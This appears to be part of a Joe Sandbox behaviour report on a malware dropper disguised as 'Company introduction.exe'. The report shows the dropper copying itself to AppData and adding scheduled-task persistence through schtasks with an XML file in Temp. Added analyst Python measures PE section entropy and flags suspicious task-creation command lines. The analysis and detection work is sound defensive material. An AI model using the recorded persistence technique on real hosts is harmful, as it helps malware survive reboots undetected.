                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: ucrtbase_clr0400.dll (loaded twice)
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll (loaded twice)
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Company introduction.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\Company introduction.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Company introduction.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Company introduction.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Company introduction.exe | Code function: 6_2_017D9C30 push esp; retf 02F1h | 6_2_017D9D55
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 7_2_0294EBFB push ecx; ret | 7_2_0294EBFC
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 7_2_06EE72DC pushad ; retf | 7_2_06EE72A1
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 12_2_01839C30 push esp; retf 0185h | 12_2_01839D55
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 12_2_06F69241 push es; ret | 12_2_06F69244
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Code function: 12_2_06F62DBF pushfd ; retf | 12_2_06F62DC1
                Source: Company introduction.exe | Static PE information: section name: .text entropy: 7.681146035096391
                Source: FzXKnGk.exe.0.dr | Static PE information: section name: .text entropy: 7.681146035096391
                Source: C:\Users\user\Desktop\Company introduction.exe | File created: C:\Users\user\AppData\Roaming\FzXKnGk.exe
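Added analyst check (not part of the Joe Sandbox report). The two ".text entropy: 7.68" lines above are the static signal behind the packer/obfuscation verdict: a .text section of compiled x86 or .NET code normally measures roughly 5.5 to 6.5 bits per byte, and a value above about 7 bits indicates compressed or encrypted content that is unpacked at run time (consistent with the identical entropy of the sample and the dropped FzXKnGk.exe, i.e. the dropper writes a copy of itself). The Python below reproduces that measurement with a minimal PE section-table walk and no third-party dependency. The PE image it builds for its own test (build_test_pe, CONSTRUCTED_SECTIONS) is a constructed fixture so the script runs offline; pass a real file path on the command line to measure an actual binary. The 7.0 threshold is a rule of thumb, not a value taken from the report.

```python
import math
import struct
import sys
from collections import Counter
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes) -> List[Tuple[str, bytes]]:
    """(name, raw bytes) for every section of a PE image.

    Minimal header walk: MZ -> e_lfanew -> PE\\0\\0 -> COFF header -> optional
    header (skipped via SizeOfOptionalHeader) -> 40-byte section headers."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        hdr = table + i * 40
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def high_entropy_sections(image: bytes, threshold: float = 7.0) -> List[Tuple[str, float]]:
    """Sections whose entropy is at or above `threshold` (rule of thumb: packed
    or encrypted code; the sample's .text at 7.68 bits would be listed here)."""
    return [(name, round(shannon_entropy(data), 3))
            for name, data in pe_sections(image)
            if shannon_entropy(data) >= threshold]


def build_test_pe(sections: List[Tuple[str, bytes]]) -> bytes:
    """Assemble a minimal, non-executable PE image around the given sections.
    Constructed test fixture only, so the parser can be exercised offline."""
    e_lfanew = 0x40
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    # COFF header: Machine=i386, NumberOfSections, 3 zeroed fields, SizeOfOptionalHeader=0, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    raw_ptr = (e_lfanew + 4 + 20 + 40 * len(sections) + 0x1FF) & ~0x1FF  # first raw offset, 512-byte aligned
    table, body = b"", b""
    for name, data in sections:
        table += name.encode().ljust(8, b"\0")
        table += struct.pack("<IIII", len(data), 0x1000, len(data), raw_ptr + len(body))
        table += b"\0" * 16  # relocation/line-number fields and Characteristics, unused here
        body += data
    return (dos + b"PE\0\0" + coff + table).ljust(raw_ptr, b"\0") + body


# Constructed sections: uniformly distributed bytes (8.0 bits, what packed or
# encrypted code looks like), low-variety data (4.0 bits) and constant padding (0 bits).
CONSTRUCTED_SECTIONS = [
    (".text", bytes(range(256)) * 8),
    (".rdata", bytes(range(16)) * 128),
    (".rsrc", b"\0" * 2048),
]


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe(CONSTRUCTED_SECTIONS)
    for name, data in pe_sections(image):
        print(f"{name:<8} {len(data):>8} bytes  entropy {shannon_entropy(data):.3f}")
    print("high-entropy sections:", high_entropy_sections(image))
```

Entropy alone does not distinguish a packer from legitimately compressed resources, so treat a hot .text section as a reason to look at the unpacked process memory (the report's injected-PE and in-memory Yara hits), not as a verdict by itself.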

                Boot Survival

                Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"
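Added detection example (not part of the Joe Sandbox report). The persistence mechanism above is the one the "Scheduled temp file as task from temp location" Sigma hit refers to: the dropper writes a task definition to a tmpXXXX.tmp file in the user's Temp folder (the name pattern .NET's Path.GetTempFileName() produces) and registers it with schtasks /Create /XML, so the task's action never appears on the command line and the definition file is deleted afterwards. The Python below scans process-creation command lines (the CommandLine field of Sysmon Event ID 1 or Security Event ID 4688) for exactly that pattern and for task actions pointing into user-writable paths. SAMPLE_COMMAND_LINES is constructed: its first entry is the schtasks line recorded in this report, the other three are made up for contrast.

```python
import re
from typing import Dict, List

# Constructed sample of process-creation command lines. Entry 0 is the schtasks
# invocation recorded in this report; entries 1-3 are invented for contrast
# (benign creation from ProgramData, persistence via /TR into AppData, a query).
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"',
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "\Microsoft\Windows\Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"',
    r'schtasks.exe /Create /SC ONLOGON /TN "OneDrive Update" /TR "C:\Users\user\AppData\Roaming\FzXKnGk.exe"',
    r'"C:\Windows\System32\schtasks.exe" /Query /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"',
]

_CREATE_RE = re.compile(r"schtasks(\.exe)?\b.*\s/Create\b", re.IGNORECASE)
# /TN, /XML and /TR values, quoted or bare.
_ARG_RE = re.compile(r'/(TN|XML|TR)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
_TEMP_RE = re.compile(r"\\Temp\\", re.IGNORECASE)
# tmpXXXX.tmp is the file name .NET Path.GetTempFileName() generates.
_TMPNAME_RE = re.compile(r"\\tmp[0-9A-F]{4}\.tmp$", re.IGNORECASE)
_USER_WRITABLE_RE = re.compile(r"\\AppData\\|\\Temp\\", re.IGNORECASE)


def parse_schtasks_create(cmdline: str) -> Dict[str, str]:
    """Return the /TN, /XML and /TR arguments (upper-case keys) of a
    `schtasks /Create` command line, or {} if the line creates no task."""
    if not _CREATE_RE.search(cmdline):
        return {}
    args: Dict[str, str] = {}
    for m in _ARG_RE.finditer(cmdline):
        args[m.group(1).upper()] = m.group(2) if m.group(2) is not None else m.group(3)
    return args


def schtasks_findings(cmdline: str) -> List[str]:
    """Tags describing why a task-creation command line looks like malware persistence."""
    args = parse_schtasks_create(cmdline)
    findings: List[str] = []
    if not args:
        return findings
    xml = args.get("XML", "")
    if _TEMP_RE.search(xml):
        findings.append("task-definition-xml-in-temp")
    if _TMPNAME_RE.search(xml):
        findings.append("gettempfilename-style-xml-name")
    if _USER_WRITABLE_RE.search(args.get("TR", "")):
        findings.append("task-action-in-user-writable-path")
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map the index of every flagged command line to its findings."""
    flagged: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        tags = schtasks_findings(line)
        if tags:
            flagged[i] = tags
    return flagged


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_COMMAND_LINES).items():
        print(f"[{i}] {', '.join(tags)}\n    {SAMPLE_COMMAND_LINES[i]}")
```

Because the /XML form hides the action, the command line alone tells you a task named Updates\FzXKnGk was registered but not what it runs; on a live host follow up with Get-ScheduledTask -TaskPath '\Updates\' and inspect the Actions property (or the task file under C:\Windows\System32\Tasks\Updates), and check the dropped C:\Users\user\AppData\Roaming\FzXKnGk.exe from the report against what the task executes.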

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 events)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 events)
                Source: C:\Users\user\Desktop\Company introduction.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\Company introduction.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Company introduction.exe | Process information set: NOOPENFILEERRORBOX (46 events)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (99 events)
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
